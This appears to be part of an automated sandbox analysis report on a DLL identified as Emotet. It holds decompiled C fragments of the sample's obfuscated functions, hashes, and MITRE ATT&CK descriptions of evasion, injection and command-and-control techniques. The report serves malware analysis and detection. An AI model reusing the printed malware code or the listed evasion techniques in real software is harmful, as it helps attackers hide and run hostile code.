				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E00BDE399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x00bd020f
0x00bd0212
0x00bd0214
0x00bd0217
0x00bd021a
0x00bd021d
0x00bd021f
0x00bd0224
0x00bd0232
0x00bd0235
0x00bd0238
0x00bd0239
0x00bd023a
0x00bd0246
0x00bd0247
0x00bd024c
0x00bd0250
0x00bd0257
0x00bd025e
0x00bd0265
0x00bd0269
0x00bd0270
0x00bd0277
0x00bd0285
0x00bd028a
0x00bd0291
0x00bd0298
0x00bd029f
0x00bd02a9
0x00bd02af
0x00bd02b2
0x00bd02d5
0x00bd02e1
0x00bd02e8

APIs

lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 00BD02E1

Strings

(Gt, xrefs: 00BD025E

Memory Dump Source

Source File: 0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_bc0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 1281838e5d57093427479dced9654404c0e626fae0ec56b2bf2726f9168e465c
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 3A2166B5E00208FBEF04DFA4CC0A9DEBBB2FB44314F108199E525AA250E7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCF3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00BCF3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E00BDE399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x00bcf3fd
0x00bcf403
0x00bcf407
0x00bcf40e
0x00bcf415
0x00bcf422
0x00bcf423
0x00bcf429
0x00bcf42c
0x00bcf433
0x00bcf43a
0x00bcf441
0x00bcf448
0x00bcf44f
0x00bcf456
0x00bcf45d
0x00bcf464
0x00bcf46b
0x00bcf479
0x00bcf47c
0x00bcf495
0x00bcf49f

APIs

ExitProcess.KERNEL32(00000000), ref: 00BCF49F

Memory Dump Source

Source File: 0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_bc0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: df7958d4c078687ff72fc5ed23b01896e18cde9ae5a90ad60a8d0db1b2b7f405
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 181106B1E1021DEBDF04DFE4C94A6EEFBB4FB14315F108188E521AA240E7B45B548F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report TYLNb8VvnmYA.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior